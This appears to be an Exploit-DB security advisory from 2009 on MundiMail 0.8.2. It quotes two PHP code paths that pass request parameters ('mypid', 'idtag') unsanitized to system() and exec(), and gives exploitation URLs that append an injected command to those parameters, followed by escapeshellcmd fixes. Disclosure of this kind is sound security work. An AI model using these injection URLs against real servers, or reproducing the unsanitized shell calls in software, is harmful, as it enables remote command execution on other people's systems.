MundiMail 0.8.2 - Remote Code Execution

EDB-ID:

10287

CVE:

N/A

Author:

Dedalo

Type:

webapps

Platform:

PHP

Published:

2009-09-07

# Reference: http://www.ccat.edu.mx/advisors/advisor5/advisor5.html
# Credits: Ccat Research Labs   - México - Coatepec, Ver.  www.ccat.edu.mx

# Software Link: http://sourceforge.net/projects/mundimail/
# Tested on: Debian, Centos & Windows Server 2000

Preview:

Code uses System() and Exec() without good practices in security.


1.- First Vulnerable Code

//need to kill daemon
		$cmd = "/bin/kill";
		$cmd .= " " . $_REQUEST["mypid"];
		system($cmd);

2.- Explotation

/admin/satus/index.php?mypid=command;


3.- Fixation


$cmd .= " " . escapeshellcmd($_REQUEST["mypid"]);

4.- Second Vulnerable Code

$cmd = ROOTDIR . "include/massmail.php";
		$cmd .= ' ' . $_REQUEST["idtag"];
		$cmd .= ' > /dev/null';
		$cmd .= ' &';
		echo $cmd . "<br>\n";
		exec($cmd);
		$mid = "../mail/success.php";

5.- Explotation

/admin/status/index.php?idtag=command;


6.-fixation

$cmd .= ' ' . escapeshellcmd($_REQUEST["idtag"]);


7.- Other

We Can use other types of Fixation bug this is an easy one ;)


8.- Greetz

www[dot]seguridadblanca[dot]com


--------------
Happy Hacking
--------------